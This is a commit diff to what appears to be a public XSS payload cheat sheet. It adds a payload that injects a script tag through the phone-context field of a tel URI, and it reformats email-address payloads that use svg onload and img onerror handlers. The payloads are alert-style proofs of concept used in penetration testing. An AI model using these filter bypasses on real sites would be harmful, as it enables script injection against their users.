XSS Tel URI

This commit is contained in:
Swissky 2024-06-03 09:37:24 +02:00
parent 6d3fef0df3
commit 2e73069238

View File

@ -775,20 +775,32 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
00000010: 6572 7428 3129 0c3e 0a ert(1).>. 00000010: 6572 7428 3129 0c3e 0a ert(1).>.
``` ```
### Bypass email filter ### Bypass email filter
([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)) * [RFC0822 compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)
```javascript ```javascript
"><svg/onload=confirm(1)>"@x.y "><svg/onload=confirm(1)>"@x.y
``` ```
([RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/)) * [RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/)
```javascript ```javascript
xss@example.com(<img src='x' onerror='alert(document.location)'>) xss@example.com(<img src='x' onerror='alert(document.location)'>)
``` ```
### Bypass tel URI filter
At least 2 RFC mention the `;phone-context=` descriptor:
* [RFC3966 - The tel URI for Telephone Numbers](https://www.ietf.org/rfc/rfc3966.txt)
* [RFC2806 - URLs for Telephone Calls](https://www.ietf.org/rfc/rfc2806.txt)
```javascript
+330011223344;phone-context=<script>alert(0)</script>
```
### Bypass document blacklist ### Bypass document blacklist
```javascript ```javascript